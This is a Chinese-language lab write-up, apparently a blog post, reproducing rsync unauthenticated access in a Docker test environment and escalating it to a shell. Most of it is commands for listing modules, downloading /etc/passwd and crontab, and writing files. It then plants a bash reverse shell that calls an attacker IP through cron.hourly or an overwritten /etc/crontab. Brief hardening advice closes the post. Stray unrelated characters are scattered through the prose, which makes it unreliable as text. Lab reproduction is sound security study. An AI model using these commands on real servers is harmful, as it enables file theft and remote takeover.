Rsync未授權(quán)訪問getshell復(fù)現(xiàn)

遵紀守法

任何個人和組織使用網(wǎng)絡(luò)應(yīng)當遵守憲法法律雪侥,遵守公共秩序碗殷,尊重社會公德,不得危害網(wǎng)絡(luò)安全速缨,不得利用網(wǎng)絡(luò)從事危害國家安全锌妻、榮譽和利益

Rsync未授權(quán)訪問漏洞

rsync是Linux下一款數(shù)據(jù)備份工具,支持通過rsync協(xié)議旬牲、ssh協(xié)議進行遠程文件傳輸仿粹。其中rsync協(xié)議默認監(jiān)聽873端口搁吓,如果目標開啟了rsync服務(wù),并且沒有配置ACL或訪問密碼吭历,我們將可以讀寫目標服務(wù)器文件擎浴。

環(huán)境搭建

docker pull vulfocus/rsync-common:latest
docker run -d -p 873:873 378d5c66daec(容器ID)
圖片.png
nmap -p 873 --script rsync-list-modules 192.168.52.132

復(fù)現(xiàn)

環(huán)境啟動后,我們用rsync命令訪問

rsync rsync://192.168.52.132:873/src/
圖片.png

如上圖毒涧,有一個src模塊贮预,我們再列出這個模塊下的文件:

rsync rsync://192.168.52.132:873/src/
圖片.png

任意文件下載

這是一個Linux根目錄,我們可以下載任意文件

#比如下載 passwd文件
rsync -av rsync://192.168.52.132:873/src/etc/passwd ./
或者
rsync -av ip::src/路徑

任意文件寫入

寫入 ceshi.txt 文件到 src 目錄
rsync -av ceshi.txt rsync://192.168.52.132:873/src/ceshi.txt
//rsync -av 文件路徑 rsync://ip:873/目標系統(tǒng)文件路徑

利用任意文件寫入契讲、下載功能來 getshell

首先下載crontab配置文件查看一下

rsync -av rsync://192.168.52.132:873/src/etc/crontab ./
圖片.png

該環(huán)境crontab中

17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
#表示每小時的第17分鐘執(zhí)行一次 run-parts --report /etc/cron.hourly

本地創(chuàng)建shell文件

touch shell.sh  #創(chuàng)建shell文件

shell內(nèi)容:

#!/bin/bash
/bin/bash -i >& /dev/tcp/192.168.52.137/8888 0>&1

賦予 shell 文件執(zhí)行權(quán)限:

chmod 777 shell.sh

將shell上傳至/etc/cron.hourly

rsync -av shell.sh rsync://192.168.52.132:873/src/etc/cron.hourly

接下來仿吞,kali本地監(jiān)聽8888端口

nc -nvlp 8888

因為每小時第十七分鐘運行我們上傳的bash腳本,所以反彈shell需要等待

第二種方法

將反彈shell文件上傳到攻擊者目錄下

rsync -av fantan.sh rsync://192.168.52.132:873/src/tmp/fantan.sh

下載對方定時任務(wù)文件crontab

rsync -av rsync://192.168.52.132:873/src/etc/crontab ./

編輯crontab文件并保存退出(每隔1分鐘運行一次腳本)

*/1 * * * * root bash /tmp/fantan.sh

反彈shell的攻擊者監(jiān)聽端口

nc -lvvp 1234

將crontab文件上傳到目標服務(wù)器:

rsync -av crontab rsync://192.168.52.132:873/src/etc/crontab

修復(fù)建議

更改rysnc默認配置文件/etc/rsyncd.conf捡偏,添加或修改參數(shù):
訪問控制唤冈;設(shè)置host allow,限制允許訪問主機的IP银伟。
權(quán)限控制你虹;設(shè)置read only,將模塊設(shè)置成只讀彤避。
訪問認證傅物;設(shè)置auth、secrets琉预,認證成功才能調(diào)用服務(wù)董饰。
模塊隱藏;設(shè)置list圆米,將模塊隱藏卒暂。

最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
  • 序言:七十年代末,一起剝皮案震驚了整個濱河市娄帖,隨后出現(xiàn)的幾起案子也祠,更是在濱河造成了極大的恐慌,老刑警劉巖近速,帶你破解...
    沈念sama閱讀 206,482評論 6 481
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件诈嘿,死亡現(xiàn)場離奇詭異,居然都是意外死亡数焊,警方通過查閱死者的電腦和手機永淌,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 88,377評論 2 382
  • 文/潘曉璐 我一進店門崎场,熙熙樓的掌柜王于貴愁眉苦臉地迎上來佩耳,“玉大人,你說我怎么就攤上這事谭跨「珊瘢” “怎么了李滴?”我有些...
    開封第一講書人閱讀 152,762評論 0 342
  • 文/不壞的土叔 我叫張陵,是天一觀的道長蛮瞄。 經(jīng)常有香客問我所坯,道長,這世上最難降的妖魔是什么挂捅? 我笑而不...
    開封第一講書人閱讀 55,273評論 1 279
  • 正文 為了忘掉前任芹助,我火速辦了婚禮,結(jié)果婚禮上闲先,老公的妹妹穿的比我還像新娘状土。我一直安慰自己,他們只是感情好伺糠,可當我...
    茶點故事閱讀 64,289評論 5 373
  • 文/花漫 我一把揭開白布蒙谓。 她就那樣靜靜地躺著,像睡著了一般训桶。 火紅的嫁衣襯著肌膚如雪累驮。 梳的紋絲不亂的頭發(fā)上,一...
    開封第一講書人閱讀 49,046評論 1 285
  • 那天舵揭,我揣著相機與錄音谤专,去河邊找鬼。 笑死午绳,一個胖子當著我的面吹牛毒租,可吹牛的內(nèi)容都是我干的。 我是一名探鬼主播箱叁,決...
    沈念sama閱讀 38,351評論 3 400
  • 文/蒼蘭香墨 我猛地睜開眼墅垮,長吁一口氣:“原來是場噩夢啊……” “哼!你這毒婦竟也來了耕漱?” 一聲冷哼從身側(cè)響起算色,我...
    開封第一講書人閱讀 36,988評論 0 259
  • 序言:老撾萬榮一對情侶失蹤,失蹤者是張志新(化名)和其女友劉穎螟够,沒想到半個月后灾梦,有當?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體,經(jīng)...
    沈念sama閱讀 43,476評論 1 300
  • 正文 獨居荒郊野嶺守林人離奇死亡妓笙,尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點故事閱讀 35,948評論 2 324
  • 正文 我和宋清朗相戀三年若河,在試婚紗的時候發(fā)現(xiàn)自己被綠了。 大學時的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片寞宫。...
    茶點故事閱讀 38,064評論 1 333
  • 序言:一個原本活蹦亂跳的男人離奇死亡萧福,死狀恐怖,靈堂內(nèi)的尸體忽然破棺而出辈赋,到底是詐尸還是另有隱情鲫忍,我是刑警寧澤膏燕,帶...
    沈念sama閱讀 33,712評論 4 323
  • 正文 年R本政府宣布,位于F島的核電站悟民,受9級特大地震影響坝辫,放射性物質(zhì)發(fā)生泄漏。R本人自食惡果不足惜射亏,卻給世界環(huán)境...
    茶點故事閱讀 39,261評論 3 307
  • 文/蒙蒙 一近忙、第九天 我趴在偏房一處隱蔽的房頂上張望。 院中可真熱鬧智润,春花似錦银锻、人聲如沸。這莊子的主人今日做“春日...
    開封第一講書人閱讀 30,264評論 0 19
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽。三九已至钾麸,卻和暖如春更振,著一層夾襖步出監(jiān)牢的瞬間,已是汗流浹背饭尝。 一陣腳步聲響...
    開封第一講書人閱讀 31,486評論 1 262
  • 我被黑心中介騙來泰國打工肯腕, 沒想到剛下飛機就差點兒被人妖公主榨干…… 1. 我叫王不留,地道東北人钥平。 一個月前我還...
    沈念sama閱讀 45,511評論 2 354
  • 正文 我出身青樓实撒,卻偏偏與公主長得像,于是被迫代替她去往敵國和親涉瘾。 傳聞我的和親對象是個殘疾皇子知态,可洞房花燭夜當晚...
    茶點故事閱讀 42,802評論 2 345

推薦閱讀更多精彩內(nèi)容